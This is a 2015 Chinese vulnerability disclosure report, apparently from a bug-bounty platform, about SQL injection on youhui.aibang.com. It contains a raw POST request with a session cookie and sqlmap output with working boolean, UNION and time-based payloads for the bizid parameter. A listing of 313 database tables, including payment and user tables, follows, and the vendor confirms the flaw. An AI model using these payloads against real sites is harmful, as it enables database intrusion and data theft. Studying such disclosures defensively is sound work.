2015-05-01: 细节已通知厂商并且等待厂商处理中 2015-05-05: 厂商已经确认,细节仅向厂商公开 2015-05-15: 细节向核心白帽子及相关领域专家公开 2015-05-25: 细节向普通白帽子公开 2015-06-04: 细节向实习白帽子公开 2015-06-19: 细节向公众公开
http://youhui.aibang.com/
其实原始消息是下面这种格式,但是用GET方法不行,那就只能转换成POST来提交:
转换后的消息:
POST /? HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://youhui.aibang.com/Cookie: mid=39; PHPSESSID=71450d98f1d11ba4fde2d0550cbd0cf1; fid=--1430458512--17519120718969; city=%E4%B8%8A%E6%B5%B7Host: youhui.aibang.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*Content-Length: 4area=discount&bizid=112021&cmd=getextralist&page=2&tid=2943273
bizid参数盲注:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: bizid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: area=discount&bizid=112021 AND 3745=3745&cmd=getextralist&page=2&tid=2943273 Type: UNION query Title: MySQL UNION query (NULL) - 37 columns Payload: area=discount&bizid=112021 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7173707271,0x47554779486a41526b6e,0x7162646671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&cmd=getextralist&page=2&tid=2943273 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: area=discount&bizid=112021 AND SLEEP(5)&cmd=getextralist&page=2&tid=2943273---web application technology: PHP 5.2.3, Apache 2.2.4back-end DBMS: MySQL 5.0.11Database: abpaid[313 tables]+---------------------------------+| ABFunc || ABLog || ABRole || ABRoleFunc || ABScore || ABScoreHistory || ABShowTemplates || ABUser || AdvIndex || AdvInfo || AdvPos || AdvPosInfo || Adv_Contract || Adv_Email || Adv_EmailMap || Adv_Matter || Adv_MatterLog || Adv_Matter_BaiduListener || AlarmSetting || BizBindWeibo || BizCategory || BizInfo || BizSuggest || Category || CityPayRatio || ClientActive || ClientVersion || FriendLink || HasYhqPaidBizSortPlan || Hotspots || KeywordPayRatio || KeywordRetView || KeywordSuggestion || KeywordWhiteList || KuaiQianRecvLog || KuaiQianSendLog || MallProductNewAuto || MallProductPlanAuto || OftenReplay || OrderTask || OrderTaskOrderQueue || OrderTaskRecord || PPC_AB_Union_TelMap || PPC_BizAccount || PPC_BizAdv || PPC_BizAppealCallMap || PPC_BizBaseInfo || PPC_BizBlackCallMap || PPC_BizCallLog || PPC_BizExtraInfo || PPC_BizNewTel || PPC_BizPrice || PPC_BizSmsTelMap || PPC_BizTel || PPC_BizTelBindMap || PPC_BizTelBindMap_bak || PPC_BizTel_bak || PPC_Black || PPC_CallPrice || PPC_CallRecord || PPC_CardGroup || PPC_ConsumptionRecord || PPC_Contract || PPC_League || PPC_LeagueCommissionRecord || PPC_LostOriginCallRecord || PPC_OriginCallRecord || PPC_RechargeCard || PPC_RechargeRecord || PPC_ShowInitTabSets || PPC_ShowTab || PPC_ShowTabItem || PPC_TEL_BACK_OP_MAP || PPC_TEL_BACK_OP_MAP_bak || PPC_Tel || PPC_UnionFinance || PaidBiz || PaidBizInfoExtra || PaidBizShare || PaidBizShareSns || PaidBizSns || PaidBizTemplateSets || PaidBiz_Discount_Cate_Map || PaidBiz_ParentDiscount_City_Map || PaidContentVector || PaidContentVector2 || PaidContentVector_1 || PaidDiscountHistory || PaidInclusionYearPrice || PaidKeywordsForSearch || PaidMessage || PaidPlacementPlan || PaidProduct || PaidProduct2 || PaidProductInfo || PaidProductInfo2 || PaidProduct_bak || PaidThread || PaidThread_bak || Paid_Youhui_Spatial || PlanDetailsInfos || PlanKeywords || PlanPay || PpccAlarmLog || PpccBiz || PpccBizPaymentRecord || PpccCategory || PpccContract || PpccKeycatemap || PpccKeyword || PpccKeywordSugg || PpccOnlineProcess || PpccPlan || PpccPlanCateMap || PromotionMsg || PublicNotice || QQTuanBGData || QQTuanCouponMap || QQTuanPayTask || QWT_BizDeviceToken || QWT_BizDeviceTokenAndroid || RankStatusView || Regions || RegionsPayRatio || SequencePayRatio || SysMsg || SystemConfig || TmpPlan || TmpPlanKeywords || TmpPlanPay || ToolUniqueId || TuanAdEmailSub || TuanAddTuanBizInfo || TuanAgent || TuanAgentAccount || TuanAgentAccountLog || TuanAgentExpenseDeduction || TuanAgentRecharge || TuanAppraiser || TuanApprkx || TuanAwardee || TuanBiz2Tuan || TuanBizMarketTabSets || TuanBizQuan || TuanBizQuanMap || TuanCPS || TuanCPSClick || TuanCPSInfo || TuanCPSOrder || TuanCate || TuanChannel || TuanChannelProductRate || TuanCharge || TuanCityArea || TuanCommonQuestion || TuanContact || TuanCoopErrorLog || TuanCoopOrderSync || TuanCoopProBiz || TuanCoopProBiz_bak || TuanCoopProDesc || TuanCoopProDesc_bak || TuanCoopProPlan || TuanCoopProPlan_bak || TuanCoopProduct || TuanCoopProductJumpLog || TuanCoopProductMap || TuanCoopProductPics || TuanCoopProductPush || TuanCoopProduct_bak || TuanCoupon || TuanCouponList || TuanCouponSendSMSLog || TuanDeliver || TuanDisplayProductCities || TuanEmailNoticeList || TuanFrmCate || TuanFrmChannel || TuanFrmClick || TuanFrmLog || TuanGift || TuanInvestigation || TuanInvestigationOther || TuanInviteClick || TuanInviteReg || TuanKingdeeAgent || TuanKingdeeBiz || TuanKingdeeCity || TuanKingdeeClerk || TuanLotteryAwardee || TuanLotteryClick || TuanLotteryCoupon || TuanLotteryPrize || TuanMallAd || TuanOrder || TuanOrderAttrMap || TuanOrderRefund || TuanPayPeriods || TuanPayPlan || TuanPayPlanDetail || TuanPaySubmitLog || TuanPost || TuanPresent || TuanPresentAttachHistory || TuanPresentCode || TuanPresentLog || TuanProduct || TuanProductAttr || TuanProductAuditLog || TuanProductBiz || TuanProductBizAccount || TuanProductDesc || TuanProductLimit || TuanProductLimitAttrMap || TuanProductPlan || TuanProductSendAccount || TuanProductSpec || TuanProductSpecAttrMap || TuanQQCBOrder || TuanQuestion || TuanRefundOrderAuditRecords || TuanRefundOrderAuditStatus || TuanSNS || TuanSNSalipay || TuanSNSkaixin001 || TuanSNSnetease163 || TuanSNSqi360 || TuanSNSsina || TuanSpecialMarket || TuanSpecialMarketOnlineMap || TuanSpecialMarketProMap || TuanStar || TuanSubCate || TuanThread || TuanUserAccountLog || TuanUserAddr || TuanUserInfo || TuanUserPhoneSns || TuanUserRecommendRelation || TuanUserRecommendRelationBackup || UserDefinedTab || UserDefinedTabContent || UserDefinedTabSchema || UserDefinedTabSubList || UserMsg || UserQuestions || WdePaidBiz || WdePaidBizComment || WdePaidBizDiscount || WdePaidBizProduct || WedAct || WedActorInfo || WtuanSrv || XBizCustomInfo || XBizTopic || XDiscount || XDiscountCate || XDiscountRecord || XDiscount_bak || XManageComment || XProductCateMap || XProductCateMap2 || XProductCategory || XProductCategory2 || XProductComment || XQQOnline || XSecondaryDomain || XTabAccess || XVideo || XVideoSite || YouhuiBrandBiz || YoujuSortDefault || YoujuSortRule || YoujuSortSpecial || ZhiFuAlipayMsgLog || ZhiFuAlipayTradeLog || ZhiFuCmbcMsgLog || ZhiFuCmbcTradeLog || ZhiFuDnapayMsgLog || ZhiFuDnapayTradeLog || ZhiFuTenpayMsgLog || ZhiFuTenpayTradeLog || ZhiFuWYBRecvLog || ZhiFuWYBSendLog || ZhiFuWYRecvlog || ZhiFuWYSendlog || ZhiFuWapTenpayMsgLog || ZhiFuWapTenpayTradeLog || _paidForSearch || ab_top_adv || bid_index || bid_pids || bizActionLog || bizVisitHistory || biz_show_item || deal || detail_info_adv || errorlog || h5_abshow_bannerpic || h5_abshow_templates || h5_give_discount || index_pids || ip_tbl || methodlog || plan || plan_pic || plandesc || seo_biz_area_district_map || seo_biz_detail || seo_biz_page || show_adv || tmpCp || virtual_user |+---------------------------------+
这么多表,随便找一个来点数据吧~
危害等级:高
漏洞Rank:13
确认时间:2015-05-05 20:11
存在该漏洞,谢谢。
暂无
